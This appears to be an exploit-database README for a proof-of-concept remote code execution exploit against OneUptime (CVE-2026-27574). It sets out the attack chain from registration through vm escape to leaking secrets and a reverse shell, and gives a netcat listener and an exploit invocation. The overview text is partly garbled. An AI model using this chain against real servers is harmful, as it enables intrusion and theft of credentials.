## https://sploitus.com/exploit?id=B6901568-5FCA-5E57-8CE0-14B10D3A6B3F
# CVE-2026-27574-OneUptime-RCE








## Overview
Proof-of-Concept exploit for **CVE-2026-27574** โ a critical code injection vulnerability (CWE-94) in **OneUptime B[Open Registration]
B --> C[Register New Account]
C --> D[Create New Project]
D --> E[Obtain ProjectMember Role]
E --> F[Create Custom JavaScript Monitor]
F --> G[Inject Malicious vm Escape Payload]
G --> H[Probe Executes Code Every ~60s]
H --> I[Escape vm Context via constructor chain]
I --> J[Access process & child_process]
J --> K[Execute System Commands]
J --> L[Leak Environment Variables]
K --> M[Read /etc/passwd, id, hostname, etc.]
L --> N[Extract ONEUPTIME_SECRET, DB/Redis passwords, etc.]
M --> O[Full RCE Achieved]
N --> O
O --> P[Optional: Reverse Shell / Data Exfiltration]
P --> Q[End - System Compromised]
```
## Features of This PoC
- Automatic account registration
- Project creation
- Malicious JavaScript monitor creation
- Environment variable leakage
- Basic command execution proof
- Optional reverse shell payload (commented)
## Usage
```bash
# Start listener (if using reverse shell)
nc -lvnp 4444
# Run the exploit
python3 exploit.py http://target:3002 --lhost YOUR_IP --lport 4444
```
## Requirements
- Python 3.6+
- `requests` library (`pip install requests`)
## Legal & Ethical Notice
**This code is provided for educational and authorized security testing purposes only.**
Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical.
## References
- [GitHub Advisory GHSA-v264-xqh4-9xmm](https://github.com/OneUptime/oneuptime/security/advisories/GHSA-v264-xqh4-9xmm)
- [Patch Commit](https://github.com/OneUptime/oneuptime/commit/7f9ed4d43945574702a26b7c206e38cc344fe427)
---
Developed by Mohammed Idrees Banyamer โข Jordan โข @banyamer_security